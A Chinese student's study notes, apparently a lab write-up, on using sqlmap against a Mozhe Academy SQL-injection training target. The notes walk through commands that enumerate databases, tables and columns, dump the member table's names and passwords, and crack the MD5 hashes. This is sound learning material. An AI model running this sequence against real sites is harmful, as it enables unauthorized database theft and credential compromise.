sqlmap实战 简单的注入学习

本人是网络安全的在校学生 为了使自己更好的学习和坚持 决定记录一下 希望一次次的记录可以使自己慢慢变强 

 自己最近在学习安全的重要工具------sqlmap，因为初次学习，为了更好的熟悉和方便，在自己本机上安装了sqlmap（未使用kali Linux）。sqlmap是一个自动化的sql注入工具，主要功能是扫描发现并利用注入漏洞。

本文为学习笔记，仅限于学习交流，不得从事违反法律相关的内容。

这里咱们使用的墨者学院 SQL 注入Mysql-字符型（这里需要去网站手动开启）这里开启之后打开网站是这样的

找到注入点 在下边的滚动条

测试注入 sqlmap -u http://219.153.49.228:41364/new_list.php?id=tingjigonggao

 

然后爆库名

sqlmap -u http://219.153.49.228:41364/new_list.php?id=tingjigonggao --dbs  显示一个数据库stormgroup

 

然后进行一些测试

之后爆出表名sqlmap -u http://219.153.49.228:41364/new_list.php?id=tingjigonggao -D stormgroup --table

这里爆出两个表 

继续爆出内容 sqlmap -u http://219.153.49.228:41364/new_list.php?id=tingjigonggao -D stormgroup -T member --columns 

获取字段值

sqlmap -u http://219.153.49.228:41364/new_list.php?id=tingjigonggao -D stormgroup -T member -C name,password,status --dump

然后md5解密即可